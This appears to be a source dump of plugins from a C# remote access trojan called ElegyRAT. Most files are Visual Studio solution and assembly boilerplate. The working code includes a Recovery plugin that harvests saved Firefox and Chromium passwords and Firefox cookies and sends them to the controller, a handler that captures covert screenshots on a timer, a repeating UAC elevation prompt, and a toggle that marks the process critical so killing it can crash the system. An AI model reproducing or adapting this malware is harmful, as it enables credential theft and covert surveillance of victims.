20 | Connection.ServerCertificate = certificate;
21 | Connection.Hwid = hwid;
22 | new Thread(() =>
23 | {
24 | Connection.InitializeClient();
25 | }).Start();
26 |
27 | while (Connection.IsConnected)
28 | {
29 | Thread.Sleep(1000);
30 | }
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/LimeLogger/LimeLogger/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | //[assembly: Guid("dafe686a-461b-402b-bbd7-2a2f4c87c773")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/LimeLogger/LimeLogger/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Miscellaneous/Miscellaneous.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29123.88
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Miscellaneous", "Miscellaneous\Miscellaneous.csproj", "{37E20BAF-3577-4CD9-BB39-18675854E255}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {37E20BAF-3577-4CD9-BB39-18675854E255}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {37E20BAF-3577-4CD9-BB39-18675854E255}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {37E20BAF-3577-4CD9-BB39-18675854E255}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {37E20BAF-3577-4CD9-BB39-18675854E255}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {25F73428-705F-4933-8D8E-8E3199E87CAB}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Miscellaneous/Miscellaneous/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Miscellaneous/Miscellaneous/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Miscellaneous/Miscellaneous/IconLib.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/Miscellaneous/Miscellaneous/IconLib.dll
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Miscellaneous/Miscellaneous/Plugin.cs:
--------------------------------------------------------------------------------
1 | using MessagePackLib.MessagePack;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Diagnostics;
5 | using System.Linq;
6 | using System.Net.Security;
7 | using System.Net.Sockets;
8 | using System.Security.Cryptography.X509Certificates;
9 | using System.Text;
10 | using System.Threading;
11 |
12 | namespace Plugin
13 | {
14 | public class Plugin
15 | {
16 | public static Socket Socket;
17 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
18 | {
19 | Debug.WriteLine("Plugin Invoked");
20 | Socket = socket;
21 | Connection.ServerCertificate = certificate;
22 | Connection.Hwid = hwid;
23 | new Thread(() =>
24 | {
25 | Connection.InitializeClient(msgPack);
26 | }).Start();
27 |
28 | while (Connection.IsConnected)
29 | {
30 | Thread.Sleep(1000);
31 | }
32 | }
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Miscellaneous/Miscellaneous/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | //[assembly: AssemblyTitle("Miscellaneous")]
9 | //[assembly: AssemblyDescription("")]
10 | //[assembly: AssemblyConfiguration("")]
11 | //[assembly: AssemblyCompany("")]
12 | //[assembly: AssemblyProduct("Miscellaneous")]
13 | //[assembly: AssemblyCopyright("Copyright © 2019")]
14 | //[assembly: AssemblyTrademark("")]
15 | //[assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | //[assembly: Guid("37e20baf-3577-4cd9-bb39-18675854e255")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Miscellaneous/Miscellaneous/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Options/Options.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29123.88
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Options", "Options\Options.csproj", "{6AA4E392-AAAF-4408-B550-85863DD4BAAF}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {6AA4E392-AAAF-4408-B550-85863DD4BAAF}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {F9806379-F782-4BAF-94F7-6E170E5E5631}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Options/Options/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Options/Options/Handler/HandleThumbnails.cs:
--------------------------------------------------------------------------------
1 | using MessagePackLib.MessagePack;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Drawing;
5 | using System.Drawing.Imaging;
6 | using System.IO;
7 | using System.Linq;
8 | using System.Text;
9 | using System.Threading;
10 | using System.Windows.Forms;
11 |
12 | namespace Plugin.Handler
13 | {
14 | public class HandleThumbnails
15 | {
16 | public HandleThumbnails()
17 | {
18 | try
19 | {
20 | Packet.ctsThumbnails?.Cancel();
21 | Packet.ctsThumbnails = new CancellationTokenSource();
22 |
23 | while (Connection.IsConnected && !Packet.ctsThumbnails.IsCancellationRequested)
24 | {
25 | Thread.Sleep(new Random().Next(2500, 7000));
26 | Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
27 | using (Graphics g = Graphics.FromImage(bmp))
28 | using (MemoryStream memoryStream = new MemoryStream())
29 | {
30 | g.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
31 | Image thumb = bmp.GetThumbnailImage(256, 256, () => false, IntPtr.Zero);
32 | thumb.Save(memoryStream, ImageFormat.Jpeg);
33 | MsgPack msgpack = new MsgPack();
34 | msgpack.ForcePathObject("Packet").AsString = "thumbnails";
35 | msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
36 | msgpack.ForcePathObject("Image").SetAsBytes(memoryStream.ToArray());
37 | Connection.Send(msgpack.Encode2Bytes());
38 | thumb.Dispose();
39 | }
40 | bmp.Dispose();
41 | }
42 | }
43 | catch
44 | {
45 | return;
46 | }
47 | Connection.Disconnected();
48 | }
49 | }
50 |
51 | }
52 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Options/Options/Handler/HandleUAC.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Diagnostics;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Windows.Forms;
7 |
8 | namespace Plugin.Handler
9 | {
10 | public class HandleUAC
11 | {
12 | public HandleUAC()
13 | {
14 | if (Methods.IsAdmin()) return;
15 | try
16 | {
17 | Process proc = new Process
18 | {
19 | StartInfo = new ProcessStartInfo
20 | {
21 | FileName = "cmd",
22 | Arguments = "/k START \"\" \"" + Application.ExecutablePath + "\" & EXIT",
23 | WindowStyle = ProcessWindowStyle.Hidden,
24 | Verb = "runas",
25 | UseShellExecute = true
26 | }
27 | };
28 | proc.Start();
29 | Methods.ClientExit();
30 | Environment.Exit(0);
31 | }
32 | catch { new HandleUAC(); }
33 | }
34 | }
35 |
36 | }
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Options/Options/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Options/Options/Methods.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Win32;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Diagnostics;
5 | using System.Linq;
6 | using System.Runtime.InteropServices;
7 | using System.Security.Principal;
8 | using System.Text;
9 | using System.Threading;
10 |
11 | namespace Plugin
12 | {
13 | public static class Methods
14 | {
15 | public static void ClientExit()
16 | {
17 | try
18 | {
19 | if (Convert.ToBoolean(Plugin.BDOS) && IsAdmin())
20 | ProcessCriticalExit();
21 | CloseMutex();
22 | Connection.SslClient?.Close();
23 | Connection.TcpClient?.Close();
24 | }
25 | catch { }
26 | }
27 |
28 | public static bool IsAdmin()
29 | {
30 | return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
31 | }
32 |
33 | public static void CloseMutex()
34 | {
35 | if (Plugin.AppMutex != null)
36 | {
37 | Plugin.AppMutex.Close();
38 | Plugin.AppMutex = null;
39 | }
40 | }
41 |
42 | public static void SystemEvents_SessionEnding(object sender, SessionEndingEventArgs e)
43 | {
44 | if (Convert.ToBoolean(Plugin.BDOS) && Methods.IsAdmin())
45 | ProcessCriticalExit();
46 | }
47 |
48 | public static void ProcessCriticalExit()
49 | {
50 | try
51 | {
52 | RtlSetProcessIsCritical(0, 0, 0);
53 | }
54 | catch
55 | {
56 | while (true)
57 | {
58 | Thread.Sleep(100000); //prevents a BSOD on exit failure
59 | }
60 | }
61 | }
62 |
63 | [DllImport("ntdll.dll", SetLastError = true)]
64 | private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
65 | }
66 | }
67 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Options/Options/Plugin.cs:
--------------------------------------------------------------------------------
1 | using System.Diagnostics;
2 | using System.Net.Sockets;
3 | using System.Security.Cryptography.X509Certificates;
4 | using System.Threading;
5 |
6 | namespace Plugin
7 | {
8 | public class Plugin
9 | {
10 | public static Socket Socket;
11 | public static Mutex AppMutex;
12 | public static string Mutex;
13 | public static string BDOS;
14 | public static string Install;
15 | public static string InstallFile;
16 |
17 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
18 | {
19 | Debug.WriteLine("Plugin Invoked");
20 | AppMutex = mutex;
21 | Mutex = mtx;
22 | BDOS = bdos;
23 | Install = install;
24 | Socket = socket;
25 | Connection.ServerCertificate = certificate;
26 | Connection.Hwid = hwid;
27 | new Thread(() =>
28 | {
29 | Connection.InitializeClient(msgPack);
30 | }).Start();
31 |
32 | while (Connection.IsConnected)
33 | {
34 | Thread.Sleep(1000);
35 | }
36 | }
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Options/Options/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | //[assembly: Guid("6aa4e392-aaaf-4408-b550-85863dd4baaf")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Options/Options/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/ProcessManager/ProcessManager.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29123.88
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessManager", "ProcessManager\ProcessManager.csproj", "{D640C36B-2C66-449B-A145-EB98322A67C8}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D640C36B-2C66-449B-A145-EB98322A67C8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {D640C36B-2C66-449B-A145-EB98322A67C8}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {D640C36B-2C66-449B-A145-EB98322A67C8}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {D640C36B-2C66-449B-A145-EB98322A67C8}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {C9F86219-B52B-4BDB-AE41-C0B5E74ADC63}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/ProcessManager/ProcessManager/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/ProcessManager/ProcessManager/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/ProcessManager/ProcessManager/Plugin.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Diagnostics;
4 | using System.Linq;
5 | using System.Net.Security;
6 | using System.Net.Sockets;
7 | using System.Security.Cryptography.X509Certificates;
8 | using System.Text;
9 | using System.Threading;
10 |
11 | namespace Plugin
12 | {
13 | public class Plugin
14 | {
15 | public static Socket Socket;
16 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
17 | {
18 | Debug.WriteLine("Plugin Invoked");
19 | Socket = socket;
20 | Connection.ServerCertificate = certificate;
21 | Connection.Hwid = hwid;
22 | new Thread(() =>
23 | {
24 | Connection.InitializeClient();
25 | }).Start();
26 |
27 | while (Connection.IsConnected)
28 | {
29 | Thread.Sleep(1000);
30 | }
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/ProcessManager/ProcessManager/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | //[assembly: Guid("d640c36b-2c66-449b-a145-eb98322a67c8")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/ProcessManager/ProcessManager/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Recovery/Recovery.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29123.88
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Recovery", "Recovery\Recovery.csproj", "{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {1C926148-C492-48B3-8F82-7EBB235A9866}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Recovery/Recovery/Browsers/Chromium/Account.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace Plugin.Browsers.Chromium
7 | {
8 | public class Account
9 | {
10 | public string UserName { get; set; }
11 |
12 | public string Password { get; set; }
13 |
14 | public string URL { get; set; }
15 |
16 | public string Application { get; set; }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Recovery/Recovery/Browsers/CredentialModel.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | namespace Plugin.Browsers
3 | {
4 | public class CredentialModel
5 | {
6 | public string Url { get; set; }
7 | public string Username { get; set; }
8 | public string Password { get; set; }
9 | }
10 | }
11 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Recovery/Recovery/Browsers/Firefox/Firefox.cs:
--------------------------------------------------------------------------------
1 | using Plugin.Browsers.Firefox.Cookies;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 | //using Plugin.Browsers.Firefox.Cookies;
8 |
9 | namespace Plugin.Browsers.Firefox
10 | {
11 | public class Firefox
12 | {
13 | public bool isOK = false;
14 | public void CookiesRecovery(StringBuilder Cooks)
15 | {
16 | try
17 | {
18 | List ffcs = Cookies.FFCookiesGrabber.Cookies();
19 | foreach (FFCookiesGrabber.FirefoxCookie fcc in ffcs)
20 | {
21 | if (!string.IsNullOrWhiteSpace(fcc.ToString()) && !isOK)
22 | {
23 | Cooks.Append("\n== Firefox ==========\n");
24 | isOK = true;
25 | }
26 | Cooks.Append(string.Concat(new string[]
27 | {
28 | fcc.ToString(),
29 | "\n\n",
30 | }));
31 | }
32 | Cooks.Append("\n");
33 | }
34 | catch
35 | {
36 | }
37 | }
38 |
39 | public void CredRecovery(StringBuilder Pass)
40 | {
41 | try
42 | {
43 |
44 | foreach (IPassReader passReader in new List
45 | {
46 | new FirefoxPassReader()
47 | })
48 | {
49 | foreach (CredentialModel credentialModel in passReader.ReadPasswords())
50 | {
51 | if (!string.IsNullOrWhiteSpace(credentialModel.Url) && !isOK)
52 | {
53 | Pass.Append("\n== Firefox ==========\n");
54 | isOK = true;
55 | }
56 | Pass.Append(string.Concat(new string[]
57 | {
58 | credentialModel.Url,
59 | "\nU: ",
60 | credentialModel.Username,
61 | "\nP: ",
62 | credentialModel.Password,
63 | "\n\n"
64 | }));
65 | }
66 | }
67 | }
68 | catch
69 | {
70 | }
71 |
72 | }
73 |
74 | }
75 | }
76 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Recovery/Recovery/Browsers/IPassReader.cs:
--------------------------------------------------------------------------------
1 | using System.Collections.Generic;
2 |
3 | namespace Plugin.Browsers
4 | {
5 | interface IPassReader
6 | {
7 | IEnumerable ReadPasswords();
8 | string BrowserName { get; }
9 | }
10 | }
11 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Recovery/Recovery/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Recovery/Recovery/Packet.cs:
--------------------------------------------------------------------------------
1 | using MessagePackLib.MessagePack;
2 | using System;
3 | using System.Text;
4 |
5 | namespace Plugin
6 | {
7 | public static class Packet
8 | {
9 | public static void Read()
10 | {
11 | try
12 | {
13 | StringBuilder Credentials = new StringBuilder();
14 | new Browsers.Firefox.Firefox().CredRecovery(Credentials);
15 | Browsers.Chromium.Chromium.Recovery(Credentials);
16 |
17 | StringBuilder Cookies = new StringBuilder();
18 | new Browsers.Firefox.Firefox().CookiesRecovery(Cookies);
19 | //new Browsers.Chromium.Chromium().CookiesRecovery(Cookies);
20 |
21 | MsgPack msgpack = new MsgPack();
22 | msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";
23 | msgpack.ForcePathObject("Password").AsString = Credentials.ToString();
24 | msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
25 | msgpack.ForcePathObject("Cookies").AsString = Cookies.ToString();
26 | Connection.Send(msgpack.Encode2Bytes());
27 | }
28 | catch (Exception ex)
29 | {
30 | Error(ex.Message);
31 | Connection.Disconnected();
32 | }
33 | }
34 |
35 | public static void Error(string ex)
36 | {
37 | MsgPack msgpack = new MsgPack();
38 | msgpack.ForcePathObject("Packet").AsString = "Error";
39 | msgpack.ForcePathObject("Error").AsString = ex;
40 | Connection.Send(msgpack.Encode2Bytes());
41 | }
42 | }
43 |
44 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Recovery/Recovery/Plugin.cs:
--------------------------------------------------------------------------------
1 | using System.Diagnostics;
2 | using System.Net.Sockets;
3 | using System.Security.Cryptography.X509Certificates;
4 | using System.Threading;
5 |
6 | namespace Plugin
7 | {
8 | public class Plugin
9 | {
10 | public static Socket Socket;
11 | public static Mutex AppMutex;
12 | public static string Mutex;
13 | public static string BDOS;
14 | public static string Install;
15 | public static string InstallFile;
16 |
17 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
18 | {
19 | Debug.WriteLine("Plugin Invoked");
20 | AppMutex = mutex;
21 | Mutex = mtx;
22 | BDOS = bdos;
23 | Install = install;
24 | Socket = socket;
25 | Connection.ServerCertificate = certificate;
26 | Connection.Hwid = hwid;
27 | new Thread(() =>
28 | {
29 | Connection.InitializeClient(msgPack);
30 | }).Start();
31 |
32 | while (Connection.IsConnected)
33 | {
34 | Thread.Sleep(1000);
35 | }
36 | }
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Recovery/Recovery/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | //[assembly: Guid("8bfc8ed2-71cc-49dc-9020-2c8199bc27b6")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/Recovery/Recovery/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
